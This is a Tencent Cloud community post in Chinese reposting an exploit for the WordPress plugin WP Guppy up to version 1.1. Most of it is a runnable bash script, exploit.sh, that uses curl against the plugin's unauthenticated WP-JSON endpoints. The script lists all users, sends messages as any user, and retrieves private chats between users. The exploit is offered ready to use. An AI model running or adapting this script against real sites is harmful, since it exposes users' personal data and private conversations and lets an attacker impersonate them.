Wordpress Plugin WP Guppy 1.1 - WP-JSON API 敏感信息披露
原创Wordpress Plugin WP Guppy 1.1 - WP-JSON API 敏感信息披露
原创
Khan安全团队
发布于 2021-12-17 07:16:53
发布于 2021-12-17 07:16:53
代码可运行
运行总次数:0
代码可运行
关联问题
换一批
供应商主页:https://wp-guppy.com/
版本:最高 1.1
测试:Kali Linux - Windows 10 - Wordpress 5.8.x 和 apache2
用法 ./exploit.sh -h
#!/bin/bash
Help()
{
# Display Help
echo "Usage"
echo
echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
echo
echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"
echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507"
echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493"
echo "-h Print this Help."
echo
}
while getopts ":h" option; do
case $option in
h) # display Help
Help
exit;;
esac
done
if [ $1 == 1 ]
then
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
fi
if [ $1 == 2 ]
then
curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool
fi
if [ $1 == 3 ]
then
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
fi原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
推荐阅读
相关推荐
WordPress 插件 wpDiscuz 7.0.4 – 任意文件上传漏洞 EXP
更多 >
腾讯云开发者
